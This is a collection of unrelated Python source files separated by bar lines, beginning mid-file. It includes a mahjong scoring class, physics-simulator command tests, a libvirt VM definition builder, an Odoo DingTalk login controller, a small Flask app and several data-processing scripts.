h.assign_value(vs[i])
model_spec = api.ModelSpec(matrix=matrix, ops=node_ops)
data = self.nasbench.query(model_spec, epochs=self.epochs)
return data
|
# -*- coding: utf-8 -*-
from mahjong.constants import TERMINAL_INDICES
from mahjong.hand_calculating.yaku import Yaku
from mahjong.utils import is_chi
class Junchan(Yaku):
"""
Every set must have at least one terminal, and the pair must be of
a terminal tile. Must contain at least one sequence (123 or 789).
Honours are not allowed
"""
def __init__(self, yaku_id=None):
super(Junchan, self).__init__(yaku_id)
def set_attributes(self):
self.tenhou_id = 33
self.name = 'Junchan'
self.english = 'Terminal In Each Meld'
self.japanese = '純全帯么九'
self.han_open = 2
self.han_closed = 3
self.is_yakuman = False
def is_condition_met(self, hand, *args):
def tile_in_indices(item_set, indices_array):
for x in item_set:
if x in indices_array:
return True
return False
terminal_sets = 0
count_of_chi = 0
for item in hand:
if is_chi(item):
count_of_chi += 1
if tile_in_indices(item, TERMINAL_INDICES):
terminal_sets += 1
if count_of_chi == 0:
return False
return terminal_sets == 5
|
pa = int(input("Digite o primeiro termo da PA: "))
ra = int(input("Digite a razão da PA: "))
soma = pa
for c in range(1, 11):
print(c, "° = ", soma)
soma = soma + ra
|
from paises import Sulamericanos
from paises import Europeus
def main(args):
sul = Sulamericanos()
sul.print_paises()
eu = Europeus()
eu.print_paises()
return
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
from config.bank_config import BankConfig
from helper.enum_definitions import AmountFormatEnum
"""
It possible to read this configuration from JSON file
but for simplicity I have constructed Python object
"""
BanksConfigDict = {
"bank1": BankConfig.default("bank1").update(
DateExpr = r"%b %d %Y", # Oct 1 2019
DatetimeFieldName = "timestamp",
TxdFieldName = "type"
),
"bank2": BankConfig.default("bank2").update(
DateExpr = r"%d-%m-%Y", # 03-10-2019
AmountFieldName = "amounts"
),
"bank3": BankConfig.default("bank3").update(
DateExpr = r"%d %b %Y", # 5 Oct 2019
DatetimeFieldName = "date_readable",
AmountFormat = AmountFormatEnum.Split,
AmountIntegerFieldName = "euro",
AmountFractionFieldName = "cents",
TxdFieldName = "type",
),
}
|
from django.db import models
class APFund(models.Model):
event = models.ForeignKey('Event', on_delete=models.CASCADE)
contribution = models.PositiveIntegerField(default=0)
notes = models.CharField(max_length=200)
last_updated = models.TimeField(auto_now=True)
|
import unittest
from nextnanopy import commands
from nextnanopy.utils.formatting import _path, _bool
import os
folder_nnp = os.path.join('tests', 'datafiles', 'nextnano++')
folder_nn3 = os.path.join('tests', 'datafiles', 'nextnano3')
folder_negf = os.path.join('tests', 'datafiles', 'nextnano.NEGF')
folder_msb = os.path.join('tests', 'datafiles', 'nextnano.MSB')
class TestCommands(unittest.TestCase):
def test_commands_nnp(self):
self.maxDiff = None
inputfile = os.path.join(folder_nnp, 'example.in')
exe = os.path.join('nextnano++', 'bin 64bit', 'nextnano++_Intel_64bit.exe')
license = os.path.join(r'nextnanopy\License', 'License_nnp.lic')
database = os.path.join('nextnano++', 'Syntax', 'database_nnp.in')
outputdirectory = r'tests\datafiles'
threads = 4
cmd = f'"{exe}" --license "{license}" --database "{database}" --threads {threads} --outputdirectory "{outputdirectory}" --noautooutdir "{inputfile}"'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
threads=threads)
from nextnanopy.nnp.defaults import command_nnp
self.assertEqual(command_nnp(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_commands_nn3(self):
self.maxDiff = None
inputfile = os.path.join(folder_nn3, 'example.in')
exe = os.path.join('nextnano++', 'bin 64bit', 'nextnano++_Intel_64bit.exe')
license = os.path.join(r'nextnanopy\License', 'License_nnp.lic')
database = os.path.join('nextnano++', 'Syntax', 'database_nnp.in')
outputdirectory = r'tests\datafiles'
threads = 4
debuglevel = 0
cancel = -1
softkill = -1
cmd = f'"{exe}" -license "{license}" -inputfile "{inputfile}" -database "{database}" -threads {threads} -outputdirectory "{outputdirectory}" -debuglevel {debuglevel} -cancel {cancel} -softkill {softkill}'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
threads=threads, debuglevel=debuglevel, cancel=cancel, softkill=softkill)
from nextnanopy.nn3.defaults import command_nn3
self.assertEqual(command_nn3(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_commands_negf(self):
self.maxDiff = None
inputfile = os.path.join(folder_negf, 'example.xml')
exe = os.path.join('nextnano.NEGF', 'nextnano.NEGF.exe')
license = os.path.join(r'License', 'License_nnQCL.lic')
database = os.path.join('nextnano.NEGF', 'Material_Database.xml')
outputdirectory = r'tests\datafiles'
threads = 4
cmd = f'"{exe}" "{inputfile}" "{outputdirectory}" "{database}" "{license}" -threads {threads}'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
threads=threads)
from nextnanopy.negf.defaults import command_negf
self.assertEqual(command_negf(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_commands_msb(self):
from nextnanopy.msb.defaults import command_msb
self.maxDiff = None
inputfile = os.path.join(folder_msb, 'example.xml')
exe = os.path.join('nextnano.MSB', 'nextnano.MSB.exe')
license = os.path.join(r'License', 'License_nnMSB.lic')
database = os.path.join('nextnano.MSB', 'Materials.xml')
outputdirectory = r'tests\datafiles'
debug = 0
cmd = f'"{exe}" -inputfile "{inputfile}" -license "{license}" -database "{database}" -outputdirectory "{outputdirectory}"'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
debug=debug)
self.assertEqual(command_msb(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
debug = 1
cmd = f'"{exe}" -inputfile "{inputfile}" -license "{license}" -database "{database}" -outputdirectory "{outputdirectory}" -debug 1'
kwargs = dict(inputfile=inputfile, exe=exe, license=license, database=database, outputdirectory=outputdirectory,
debug=debug)
self.assertEqual(command_msb(**kwargs), cmd)
self.assertEqual(commands.command(**kwargs), cmd)
def test_path(self):
self.assertEqual(_path('aa\nb.test'), '"aa\nb.test"')
self.assertEqual(_path('aa\nb'), '"aa\nb"')
self.assertEqual(_path(''), '')
self.assertEqual(_path(2), '"2"')
self.assertEqual(_path(None), None)
def test_execute(self):
self.assertRaises(ValueError, commands.execute, inputfile='', exe='', license='', database='',
outputdirectory='')
self.assertRaises(ValueError, commands.execute, inputfile=r'test\datafiles', exe='', license='', database='',
outputdirectory='')
def test_bool(self):
self.assertEqual(_bool(''), False)
self.assertEqual(_bool(None), False)
self.assertEqual(_bool('1'), True)
self.assertEqual(_bool('0'), True)
self.assertEqual(_bool(0), True)
self.assertEqual(_bool(1), True)
if __name__ == '__main__':
unittest.main()
|
import datetime
from app.api.v2.utils.db_connection import connect
from psycopg2.extras import RealDictCursor
from instance.config import app_config
# from manage import Database
import psycopg2
import os
# db = Database()
environment = os.environ["APP_SETTINGS"]
DATABASE_URL = app_config[environment].DATABASE_URL
class Meetups():
"""This class holds data for all meetups"""
def create_meetup(self, location=None, topic=None, happeningOn=None):
"""Model for posting a meetup"""
createdOn = datetime.datetime.now().strftime("%y-%m-%d-%H-%M")
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute("INSERT INTO meetups (createdOn, location, topic, happeningOn) VALUES(%s,%s,%s,%s) RETURNING meetup_id, location, topic", (
createdOn, location, topic, happeningOn))
result = cursor.fetchone()
return result
def check_meetup(self, topic):
'''Get meetup by topic'''
try:
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute(
"SELECT * FROM meetups WHERE topic = %s", (topic,))
result = cursor.fetchone()
return result
except:
pass
def get_all_meetups(self):
"""Get all meetups"""
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute("SELECT * FROM meetups")
result = cursor.fetchall()
return result
def get_specific_meetup(self, meetup_id):
"""Get meetup by meetup_id"""
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute(
"SELECT * FROM meetups WHERE meetup_id = %s", (meetup_id,))
result = cursor.fetchone()
return result
def delete_meetup(self, meetup_id):
"""Delete all meetups"""
with connect() as connection:
with connection.cursor(cursor_factory=RealDictCursor) as cursor:
cursor.execute(
"DELETE FROM meetups WHERE meetup_id = %s", (meetup_id,))
|
import os
class Processor:
def __init__(self, node_coappearance_file_name):
hyperedge_file_name = "hyperedges.csv"
print "Processing file " + node_coappearance_file_name
self.process_node_coappearance_file(node_coappearance_file_name, hyperedge_file_name)
def dict_to_string(self, D):
pairs = sorted(D.iteritems(), key = lambda ele: ele[0])
return ", ".join(map(lambda ele: ele[0].encode("utf-8") + ":" + str(ele[1]), pairs))
##read edge file. Each line of the file should be of this format:
#a,1;b,2;c,3
#The , is optional in the above line.
#Each line is read as as dictionary.
#Different lines may have identical keys, in which case we need to merge these lines.
#The final result is stored in self.all_node_counts.
#The keys of self.all_node_counts are the node set, and the values are the merged node_count dictionary.
def process_node_coappearance_file(self, node_coappearance_file_name, hyperedge_file_name):
assert(os.path.exists(node_coappearance_file_name))
self.all_node_counts = dict()
reader = open(node_coappearance_file_name, "r")
for (index, string) in enumerate(reader):
a = string.decode("utf-8").strip("\n").split(", ")
node_counts = dict()
for i in range(len(a)):
b = a[i].split(":")
if len(b) == 1:
weight = 1.0
else:
weight = float(b[1])
node_counts[b[0]] = weight
keys = ",".join((sorted(node_counts.keys())))
if keys in self.all_node_counts:
self.all_node_counts[keys].append(node_counts)
else:
self.all_node_counts[keys] = [node_counts]
reader.close()
def merge_node_counts(node_counts_list):
result = dict()
for i in range(len(node_counts_list)):
keys = node_counts_list[i]
for key in keys:
if key in result:
result[key] += node_counts_list[i][key]
else:
result[key] = node_counts_list[i][key]
return result
keys = self.all_node_counts.keys()
for key in keys:
node_counts_list = self.all_node_counts[key]
if len(node_counts_list) > 0:
self.all_node_counts[key] = merge_node_counts(node_counts_list)
def get_max_frequency(D):
a = list(D.iteritems())
return max(map(lambda ele: ele[1], a))
writer = open(hyperedge_file_name, "w")
pairs = sorted(self.all_node_counts.iteritems(), key = lambda ele: get_max_frequency(ele[1]), reverse = True)
for i in range(len(pairs)):
if len(pairs[i][1]) > 1:
writer.write(self.dict_to_string(pairs[i][1]) + "\n")
writer.close()
def read_aliases(alias_file_name, character_list_file_name):
aliases = dict()
assert(os.path.exists(alias_file_name))
assert(os.path.exists(character_list_file_name))
reader = open(alias_file_name, "r")
for (index, string) in enumerate(reader):
a = string.strip("\n").decode("utf-8").split(":")
name = a[0]
alias_names = a[1].split(",")
aliases[name] = alias_names
reader.close()
reader = open(character_list_file_name, "r")
for (index, string) in enumerate(reader):
name = string.strip("\n").decode("utf-8")
if name in aliases:
continue
aliases[name] = []
reader.close()
return aliases
def get_scenes(content_list_file_name, aliases, output_file_name, iprint = False):
reader = open(content_list_file_name, "r")
content_list = reader.readlines()
reader.close()
content_list = map(lambda line: line.strip("\n"), content_list)
corpus = []
for i in range(len(content_list)):
#number = int(content_list[i].split("/")[-1].split(".")[0].split("_")[-1])
#if number > 80:
# continue
reader = open(content_list[i], "r")
lines = reader.readlines()
reader.close()
corpus += map(lambda line: line.strip("\n").decode("utf-8"), lines)
names = aliases.keys()
alias_is_subname = dict()
for name in names:
alias_names = aliases[name]
for alias_name in alias_names:
if alias_name in name:
alias_is_subname[name] = True
break
if name not in alias_is_subname:
alias_is_subname[name] = False
def step_function(x):
if x > 0:
return 1
return 0
if iprint:
writer = open("all_paragraphs.txt", "w")
scenes = []
for paragraph in corpus:
character_appearance_times = dict()
for name in names:
if name in paragraph:
counter = paragraph.count(name)
if alias_is_subname[name]:
counter = 0
alias_names = aliases[name]
for alias_name in alias_names:
counter += paragraph.count(alias_name)
character_appearance_times[name] = step_function(counter)
else:
alias_names = aliases[name]
found = False
for alias_name in alias_names:
if alias_name in paragraph:
found = True
break
if found:
counter = 1
for alias_name in alias_names:
counter += paragraph.count(alias_name)
character_appearance_times[name] = step_function(counter)
if len(character_appearance_times) > 0:
scenes.append(character_appearance_times)
if iprint:
writer.write(paragraph.encode("utf-8") + "\n")
keys = character_appearance_times.keys()
for key in keys:
writer.write(key.encode("utf-8") + " : " + str(character_appearance_times[key]) + "\n")
writer.write("\n\n")
if iprint:
writer.close()
writer = open(output_file_name, "w")
for i in range(len(scenes)):
scene = scenes[i]
scene = sorted(scene.iteritems(), key = lambda ele: ele[1], reverse = True)
scene = map(lambda ele: ele[0] + ":" + str(ele[1]), scene)
writer.write((", ".join(scene)).encode("utf-8") + "\n")
writer.close()
def main():
import sys
if len(sys.argv) != 2:
print "content_list_file_name = sys.argv[1]. "
return -1
content_list_file_name = sys.argv[1]
aliases = read_aliases("aliases.dat", "names.dat")
scene_file_name = "scenes.dat"
print "Getting node coappearance times ... "
iprint = True
get_scenes(content_list_file_name, aliases, scene_file_name, iprint)
print "Generating hyperedges ... "
processor = Processor(scene_file_name)
return 0
if __name__ == "__main__":
import sys
sys.exit(main())
|
import ast
import meta
import coral_ast as cast
import coral_types as ct
# Public API
# Turn this on for printing.
verbose = False
def vprint(a):
global verbose
if verbose:
print a
def convert_to_coral_ast(func):
"""
Converts a Python function to a Coral AST.
"""
# A Python AST.
tree = meta.decompiler.decompile_func(func)
vprint(ast.dump(tree))
coral_tree = _generate_coral_ast(tree)
vprint(coral_tree)
return coral_tree
# Ghetto a.f.
vocabs = []
def extract_vocabularies(coral_tree):
global vocabs
assert isinstance(coral_tree, cast.LabelingFunction)
vocabs = [str(v) for v in coral_tree.vocabs]
def _extract_vocabs(node):
global vocabs
if isinstance(node.ty, ct.VocabType):
vocabs.append(str(node.ty))
coral_tree.walk(_extract_vocabs)
# Uniquify
return list(set(list(vocabs)))
### Private Stuff.
def _generate_coral_ast(node, names={}):
"""
Generates a Coral AST given a Python AST.
"""
if isinstance(node, ast.FunctionDef):
args = [name.id for name in node.args.args]
for arg in args:
names[arg] = cast.VocabLiteral(arg)
body = [_generate_coral_ast(b, names) for b in node.body]
expr = cast.LabelingFunction(body, args)
return expr
if isinstance(node, ast.Return):
return cast.Return(_generate_coral_ast(node.value, names))
if isinstance(node, ast.If):
cond = _generate_coral_ast(node.test, names)
true_branch = _generate_coral_ast(node.body[0], names)
expr = cast.IfThen(cond, true_branch)
vprint(expr)
return expr
if isinstance(node, ast.Compare):
left = _generate_coral_ast(node.left, names)
right = _generate_coral_ast(node.comparators[0], names)
op = node.ops[0]
if isinstance(op, ast.Eq):
expr = cast.Equal(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.Gt):
expr = cast.GreaterThan(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.Lt):
expr = cast.LessThan(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.LtE):
expr = cast.LessThanOrEqual(left, right)
vprint(expr)
return expr
elif isinstance(op, ast.GtE):
expr = cast.GreaterThanOrEqual(left, right)
vprint(expr)
return expr
if isinstance(node, ast.BinOp):
if isinstance(node.op, ast.Add):
expr = cast.Add(_generate_coral_ast(node.left, names), _generate_coral_ast(node.right,
names))
elif isinstance(node.op, ast.Mult):
expr = cast.Multiply(_generate_coral_ast(node.left, names),
_generate_coral_ast(node.right, names))
if isinstance(node.op, ast.Sub):
expr = cast.Subtract(_generate_coral_ast(node.left, names),
_generate_coral_ast(node.right, names))
vprint(expr)
return expr
if isinstance(node, ast.Name):
if node.id == "True":
expr = cast.TrueLabelLiteral()
elif node.id == "False":
expr = cast.FalseLabelLiteral()
elif node.id == "None":
expr = cast.AbstainLabelLiteral()
else:
expr = names[node.id]
vprint(expr)
return expr
if isinstance(node, ast.Num):
return cast.PythonLiteral(node.n)
|
# coding: UTF-8
from xml.etree.ElementTree import Element, SubElement
import xml.etree.ElementTree as ET
import uuid
import libvirt
import uuid
from kvmconnect.base import BaseOpen
class VmGen:
"""
Create VM
parameters:
name: VM (domain) name
cpu:
arch: cpu architecture
nvcpu: number of vcpus
memory: memory size of VM
disk: storage path
cdrom: iso image path
nic:
type: type of NIC
source: host NIC
(mac_addr): mac address
model: nic mode (ex. virtio, e1000, ...)
vnc_password: vnc_password
"""
def __init__(self):
pass
def __call__(self, name, cpu, memory, disk, cdrom, nic, vnc_password):
root = Element('domain', attrib={'type': 'kvm'})
el_name = Element('name')
el_name.text = name
root.append(el_name)
el_memory = Element('memory')
el_memory.text = memory
root.append(el_memory)
el_vcpu = Element('vcpu')
el_vcpu.text = cpu['nvcpu']
root.append(el_vcpu)
# <os>
# <type arch="${arch}">hvm</type>
# <boot dev="cdrom"/>
# <boot dev="hd"/>
# </os>
el_os = Element('os')
el_type = Element('type', attrib={'arch': cpu['arch']})
el_type.text = "hvm"
el_boot1 = Element('boot', attrib={'dev': 'cdrom'})
el_boot2 = Element('boot', attrib={'dev': 'hd'})
el_os.append(el_type)
el_os.append(el_boot1)
el_os.append(el_boot2)
root.append(el_os)
# <features>
# <acpi/>
# <apic/>
# </features>
el_features = Element('features')
el_acpi = Element('acpi')
el_apic = Element('apic')
el_features.append(el_acpi)
el_features.append(el_apic)
root.append(el_features)
# <cpu mode="custom" match="exact">
# <model>IvyBridge</model>
# </cpu>
el_cpu = Element('cpu', attrib={'mode': 'custom', 'match': 'exact'})
el_model = Element('model')
el_cpu.append(el_model)
root.append(el_cpu)
# <clock offset="utc">
# <timer name="rtc" tickpolicy="catchup"/>
# <timer name="pit" tickpolicy="delay"/>
# <timer name="hpet" present="no"/>
# </clock>
el_clock = Element('clock', attrib={'offset': 'utc'})
el_timer1 = Element('timer', attrib={'name': 'rtc', 'tickpolicy': 'catchup'})
el_timer2 = Element('timer', attrib={'name': 'pit', 'tickpolicy': 'delay'})
el_timer3 = Element('timer', attrib={'name': 'hpet', 'present': 'no'})
el_clock.append(el_timer1)
el_clock.append(el_timer2)
el_clock.append(el_timer3)
root.append(el_clock)
# <on_poweroff>destroy</on_poweroff>
# <on_reboot>restart</on_reboot>
# <on_crash>restart</on_crash>
el_on1 = Element('on_poweroff')
el_on1.text = 'destroy'
el_on2 = Element('on_reboot')
el_on2.text = 'restart'
el_on3 = Element('on_crash')
el_on3.text = 'restart'
root.append(el_on1)
root.append(el_on2)
root.append(el_on3)
# <pm>
# <suspend-to-mem enabled="no"/>
# <suspend-to-disk enabled="no"/>
# </pm>
el_pm = Element('pm')
el_suspend1 = Element('suspend-to-mem', attrib={'enabled': 'no'})
el_suspend2 = Element('suspend-to-disk', attrib={'enabled': 'no'})
el_pm.append(el_suspend1)
el_pm.append(el_suspend2)
root.append(el_pm)
# devices
el_devices = Element('devices')
# <disk type="file" device="disk">
# <driver name="qemu" type="raw"/>
# <source file="${disk}"/>
# <target dev="vda" bus="virtio"/>
# </disk>
el_disk = Element('disk', attrib={'type': 'file', 'device': 'disk'})
el_driver = Element('driver', attrib={'name': 'qemu', 'type': 'raw'})
el_source = Element('source', attrib={'file': disk})
el_target = Element('target', attrib={'dev': 'vda', 'bus': 'virtio'})
el_disk.append(el_driver)
el_disk.append(el_source)
el_disk.append(el_target)
el_devices.append(el_disk)
# <disk type="file" device="cdrom">
# <driver name="qemu" type="raw"/>
# <source file="${cdrom}"/>
# <target dev="hda" bus="ide"/>
# <readonly/>
# </disk>
el_disk = Element('disk', attrib={'type': 'file', 'device': 'cdrom'})
el_driver = Element('driver', attrib={'name': 'qemu', 'type': 'raw'})
el_source = Element('source', attrib={'file': cdrom})
el_target = Element('target', attrib={'dev': 'hda', 'bus': 'ide'})
el_readonly = Element('readonly')
el_disk.append(el_driver)
el_disk.append(el_source)
el_disk.append(el_target)
el_disk.append(el_readonly)
el_devices.append(el_disk)
# <interface type="${type}">
# <source bridge="${source}"/>
# <mac address="${mac_addr}"/>
# <model type="${model}"/>
# </interface>
el_interface = Element('interface', attrib={'type': nic['type']})
el_source = Element('source', attrib={'bridge': nic['source']})
el_model = Element('model', attrib={'type': nic['model']})
el_interface.append(el_source)
if nic['mac_addr']:
el_mac = Element('mac', attrib={'address': nic['mac_addr']})
el_interface.append(el_mac)
el_interface.append(el_model)
el_devices.append(el_interface)
# <input type="mouse" bus="ps2"/>
el_input = Element('input', attrib={'type': 'mouse', 'bus': 'ps2'})
el_devices.append(el_input)
# <graphics type="vnc" port="-1" listen="0.0.0.0" passwd="${vnc_password}"/>
el_graphics = Element('graphics', attrib={'type': 'vnc', 'port': '-1',
'listen': '0.0.0.0', 'passwd': vnc_password})
el_devices.append(el_graphics)
# <console type="pty"/>
el_console = Element('console', attrib={'type': 'pty'})
el_devices.append(el_console)
root.append(el_devices)
self.xml = ET.tostring(root).decode('utf-8').replace('\n', '')
|
# -*- coding: utf-8 -*-
import json
import logging
import werkzeug
from werkzeug.exceptions import BadRequest
from odoo import SUPERUSER_ID, api, http, _, exceptions
from odoo import registry as registry_get
from odoo.addons.auth_oauth.controllers.main import OAuthLogin
from odoo.addons.web.controllers.main import (login_and_redirect, ensure_db, set_cookie_and_redirect)
from odoo.http import request
from odoo.addons.dingtalk_base.tools import dingtalk_tool as dt
_logger = logging.getLogger(__name__)
class DingTalkLogin(OAuthLogin):
@http.route('/web/dingtalk/login', type='http', auth='none', website=True, sitemap=False)
def web_dingtalk_login(self, *args, **kw):
"""
构造扫码登录页面
:param args:
:param kw:
:return:
"""
ensure_db()
if not request.session.uid:
return request.render('dingtalk_login.dingtalk_login_signup', kw)
request.uid = request.session.uid
try:
context = request.env['ir.http'].webclient_rendering_context()
response = request.render('web.webclient_bootstrap', qcontext=context)
response.headers['X-Frame-Options'] = 'DENY'
return response
except exceptions.AccessError:
if request.session.uid:
request.session.uid = False
if request.session.login:
request.session.login = False
return request.render('dingtalk_login.dingtalk_login_signup')
@http.route('/web/dingtalk/get/companys', type='http', auth='public', website=True, sitemap=False)
def dingtalk_get_companys(self):
result = {
"company_list": request.env['res.company'].with_user(SUPERUSER_ID).search_read([], ['name', 'id'])
}
return json.dumps(result)
@http.route('/web/dingtalk/get_login_url', type='http', auth="none")
def dingtalk_get_login_url(self, **kw):
"""
拼接访问钉钉的验证用户的url
:param kw:
:return:
"""
params_data = request.params.copy()
local_url = params_data.get('local_url')
company_id = int(params_data.get('company_id'))
config = request.env['dingtalk.config'].with_user(SUPERUSER_ID).search([('company_id', '=', company_id)], limit=1)
if not config:
return json.dumps({'state': False, 'error': '该公司未设置扫码登录'})
redirect_url = "{}/web/dingtalk/login/redirect".format(local_url)
url = "https://oapi.dingtalk.com/connect/oauth2/sns_authorize?appid={}&response_type=code&scope=" \
"snsapi_login&redirect_uri={}&state={}".format(config.login_id, redirect_url, company_id)
data = json.dumps({'state': True, "encode_url": url, 'callback_url': redirect_url})
return data
@http.route('/web/dingtalk/login/redirect', type='http', auth="none", website=True, sitemap=False)
def web_dingtalk_login_redirect(self, **kw):
"""
接受钉钉返回的扫码登录结果
:param kw:
:return:
"""
params_data = request.params.copy()
params_data['providers'] = self.list_providers()
_logger.info(">>>钉钉扫码登录返回code参数为:{}".format(params_data.get('code')))
company_id = params_data.get('state')
if not company_id:
params_data['error'] = _("钉钉扫码返回的数据格式不正确,请重试!")
return request.render('web.login', params_data)
try:
company_id = int(company_id)
user_info = dt.get_userinfo_by_code(request, params_data.get('code'), company_id)
_logger.info(">>>用户身份信息:{}".format(user_info))
domain = [('din_unionid', '=', user_info.get('unionid')), ('company_id', '=', company_id)]
employee = request.env['hr.employee'].with_user(SUPERUSER_ID).search(domain, limit=1)
if not employee.user_id:
params_data['error'] = _("员工[{}]未关联系统登录用户,请联系管理员处理!".format(employee.name))
return request.render('web.login', params_data)
else:
return self.dingtalk_employee_login(employee, params_data)
except Exception as e:
params_data['error'] = str(e)
return request.render('web.login', params_data)
def dingtalk_employee_login(self, employee, params_data):
"""
利用员工进行系统登录
:param employee:
:param params_data:
:return:
"""
ensure_db()
dbname = request.session.db
if not http.db_filter([dbname]):
return BadRequest()
registry = registry_get(dbname)
with registry.cursor() as cr:
try:
env = api.Environment(cr, SUPERUSER_ID, {})
credentials = env['res.users'].with_user(SUPERUSER_ID).auth_oauth('dingtalk_login', employee.ding_id)
cr.commit()
url = '/web'
resp = login_and_redirect(*credentials, redirect_url=url)
if werkzeug.urls.url_parse(resp.location).path == '/web' and not request.env.user.has_group('base.group_user'):
resp.location = '/'
return resp
except Exception as e:
params_data['error'] = "登录时发生错误:{}".format(str(e))
return request.render('web.login', params_data)
class OAuthController(OAuthLogin):
@http.route('/web/dingtalk/auto/login', type='http', auth='public', website=True)
def web_dingtalk_auto_login(self, **kw):
"""
免登入口
:param kw:
:return:
"""
ensure_db()
logging.info(">>>用户正在使用免登...")
# if request.session.uid:
# return request.redirect('/web')
# 获取用于免登的公司corp_id
config = request.env['dingtalk.config'].sudo().search([('m_login', '=', True)], limit=1)
if not config:
params_data = request.params.copy()
params_data['providers'] = self.list_providers()
params_data['error'] = "系统没有配置可用于免登的公司!"
return request.render('web.login', params_data)
return request.render('dingtalk_login.dingtalk_auto_login_signup', {'corp_id': config.corp_id})
@http.route('/web/dingtalk/auto/login/action', type='http', auth='none', website=True, sitemap=False)
def web_dingtalk_auto_signin_action(self, **kw):
"""
通过获得的【免登授权码或者临时授权码】获取用户信息
:param kw:
:return:
"""
params_data = request.params.copy()
params_data['providers'] = self.list_providers()
logging.info(">>>免登授权码: %s", params_data.get('authCode'))
config = request.env['dingtalk.config'].with_user(SUPERUSER_ID).search([('m_login', '=', True)], limit=1)
client = dt.get_client(request, dt.get_dingtalk_config(request, config.company_id))
try:
result = client.user.getuserinfo(params_data.get('authCode'))
except Exception as e:
params_data['error'] = str(e)
return request.render('web.login', params_data)
domain = [('ding_id', '=', result.userid), ('company_id', '=', config.company_id.id)]
employee = request.env['hr.employee'].with_user(SUPERUSER_ID).search(domain, limit=1)
if not employee:
params_data['error'] = _("员工[{}]未关联系统登录用户,请联系管理员处理!".format(employee.name))
return request.render('web.login', params_data)
_logger.info(">>>员工:{}正在尝试登录系统".format(employee.name))
if not employee.ding_id:
params_data['error'] = _("员工[{}]不存在钉钉ID,请维护后再试!".format(employee.name))
return request.render('web.login', params_data)
if not employee.user_id:
params_data['error'] = _("你还没有关联系统用户,请联系管理员处理!")
return request.render('web.login', params_data)
ensure_db()
dbname = request.session.db
if not http.db_filter([dbname]):
return BadRequest()
registry = registry_get(dbname)
with registry.cursor() as cr:
try:
env = api.Environment(cr, SUPERUSER_ID, {})
redentials = env['res.users'].sudo().auth_oauth('dingtalk_login', employee.ding_id)
cr.commit()
url = '/web'
resp = login_and_redirect(*redentials, redirect_url=url)
if werkzeug.urls.url_parse(resp.location).path == '/web' and not request.env.user.has_group('base.group_user'):
resp.location = '/'
return resp
except Exception as e:
params_data['error'] = "登录时发生错误:{}".format(str(e))
return request.render('web.login', params_data)
|
#!/usr/bin/env python
#
# ======================================================================
#
# Brad T. Aagaard, U.S. Geological Survey
#
# This code was developed as part of the Computational Infrastructure
# for Geodynamics (http://geodynamics.org).
#
# Copyright (c) 2010-2017 University of California, Davis
#
# See COPYING for license information.
#
# ======================================================================
#
import unittest
class TestCSGeo(unittest.TestCase):
def test_initialize(self):
from spatialdata.geocoords.CSGeo import CSGeo
cs = CSGeo()
cs.inventory.ellipsoid = "clrk66"
cs.inventory.datumHoriz = "NAD27"
cs.inventory.datumVert = "mean sea level"
cs.inventory.units = "km"
cs.inventory.spaceDim = 2
cs._configure()
cs.initialize()
self.assertEqual("clrk66", cs.ellipsoid())
self.assertEqual("NAD27", cs.datumHoriz())
self.assertEqual("mean sea level", cs.datumVert())
self.assertEqual(False, cs.isGeocentric())
self.assertEqual(1.0e+3, cs.toMeters())
self.assertEqual(2, cs.spaceDim())
return
# End of file
|
from flask import Flask, redirect, url_for, render_template, request, session, send_file
app = Flask(__name__)
@app.route("/")
def home():
return render_template("index.html")
@app.route("/login", methods=["POST", "GET"])
def login():
if request.method == "POST":
user = request.form["nm"]
session["user"] = user
return redirect(url_for("user", usr=user))
else:
return render_template("login.html")
@app.route("/file", methods=["GET"])
def generate_pdf():
return render_template("pdf.html")
@app.route("/file_download")
def file_download():
return send_file('/Users/rob/Documents/GitHub/BloodAnalysis/Models/test.txt')
@app.route("/<usr>")
def user(usr):
return f"<h1>{usr}</h1>"
@app.route("/params")
def params():
arg1 = request.args['arg1']
arg2 = request.args['arg2']
return ""
if __name__ == "__main__":
app.run()
|
import json
import jsonlines
import spacy
from spacy.kb import KnowledgeBase
def save_500():
# Prepare datafiles
json_loc = "../../data/prodigy_data/annotations_input.jsonl"
new_loc = "../../data/prodigy_data/iaa_input.jsonl"
# Prepare resources
nlp = spacy.load('../resources/nen_nlp')
kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
kb.load_bulk('../resources/kb_initial')
i = 0
j = 0
unique_orgs = []
limit = 400
# Open file to save IAA-annotations in
outfile = jsonlines.open(new_loc, 'w')
# Go through all annotations
with open(json_loc, 'r', encoding='utf8') as jsonfile:
for line in jsonfile:
example = json.loads(line)
org = example['org']
if len(kb.get_candidates(org)) > 1:
i += 1
if i > 4070 and org not in unique_orgs and j < limit:
j += 1
outfile.write(example)
unique_orgs.append(org)
print(j, ", sample: ", i)
outfile.close()
print(f"{limit} IAA-annotations Prodigy input saved in ../prodigy/iaa_input.jsonl")
def main():
save_500()
if __name__ == '__main__':
main()
|
from datetime import datetime
from threading import Timer
from . import now
from . import start_web_interface
port = 8765
class Scheduler(object):
"""
Manages Job objects and the waiting between job executions
"""
def __init__(self, log=None):
self.jobs = []
self.current_job = None
self.sleeper = None
self.running = False
if log:
self.log = log
else:
import logging
self.log = logging.getLogger('pyriodic_dummy')
self.log.info('Initializing Scheduler')
def _set_timer(self):
"""
Finds the next job and if it isn't already then it will set it as the current job.
From there it sets a timer to wait for the next scheduled time for that job to execute.
"""
if self.jobs:
next_job = self.jobs[0]
